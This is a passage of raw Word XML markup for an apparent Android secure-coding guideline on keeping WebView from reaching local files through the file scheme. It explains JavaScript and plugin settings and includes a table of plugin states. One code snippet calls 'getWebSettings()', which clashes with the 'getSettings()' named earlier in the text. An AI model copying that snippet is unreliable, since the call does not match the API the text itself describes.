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27C1173" w14:textId="3EC07691" w:rsidR="00EF56E8" w:rsidRPr="00324837" w:rsidRDefault="00BB6B81">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324837">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DRD02-J. Do not allow WebView to access sensitive local resource through file scheme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789172BD" w14:textId="7EEBA33C" w:rsidR="00BB6B81" w:rsidRPr="00AF7489" w:rsidRDefault="00BB6B81">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D940A22" w14:textId="5EA7A3FD" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00D24FC3" w:rsidP="00324837">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In android development, </w:t>
      </w:r>
      <w:r w:rsidR="00343A3C" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>it is imperative to not allow WebView to access sensitive local resource through file scheme. T</w:t>
      </w:r>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>he WebView class displays web pages as part of an activity layout. The behavior of a WebView object can be customized using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>WebSettings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t> object, which can be obtained from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>WebView.getSettings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:r w:rsidR="00324837" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security </w:t>
      </w:r>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">concerns </w:t>
      </w:r>
      <w:r w:rsidR="00324837" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>come</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00324837" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00324837" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>setJavaScriptEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>setPluginState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(), and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>setAllowFileAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidR="00324837" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>are used</w:t>
      </w:r>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6355B66E" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setJavaScriptEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763D9538" w14:textId="492B0062" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The set</w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>JavaScriptEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>) tells WebView to enable JavaScript execution. To set it true:</w:t>
      </w:r>
      <w:r w:rsidR="00324837" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>webview.getWebSettings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>setJavaScriptEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(true)</w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The default </w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">value </w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>is false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33927955" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setPluginState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1545929D" w14:textId="6DD5E555" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00D24FC3" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Figure 1 shows t</w:t>
      </w:r>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>he </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>setPluginState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F415AD" w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>) method</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">’s state and what they represent. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The default </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">value </w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>is OFF</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1645"/>
        <w:gridCol w:w="7699"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F415AD" w:rsidRPr="00F415AD" w14:paraId="0DC588DA" w14:textId="77777777" w:rsidTr="00F415AD">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2916579F" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ON</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92C2648" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>any object will be loaded even if a plugin does not exist to handle the content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F415AD" w:rsidRPr="00F415AD" w14:paraId="5C6A502A" w14:textId="77777777" w:rsidTr="00F415AD">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6E1FCDDD" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ON_DEMAND</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552979BD" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>if there is a plugin that can handle the content, a placeholder is shown until the user clicks on the placeholder.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33303B93" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Once clicked, the plugin will be enabled on the page.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F415AD" w:rsidRPr="00F415AD" w14:paraId="3ABEEC9C" w14:textId="77777777" w:rsidTr="00F415AD">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75924C52" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="C1C7D0"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="C1C7D0"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C1C7D0"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="C1C7D0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="105" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="105" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0886E9AB" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>all plugins will be turned off and any fallback content will be used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="291AF90E" w14:textId="7DC55AF2" w:rsidR="00324837" w:rsidRPr="00D24FC3" w:rsidRDefault="00324837" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D24FC3">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Figure 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D24FC3">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00D24FC3">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D24FC3">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">States of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00D24FC3">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>setPluginState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00D24FC3">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D24FC3" w:rsidRPr="00D24FC3">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>) method</w:t>
      </w:r>
      <w:r w:rsidRPr="00D24FC3">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
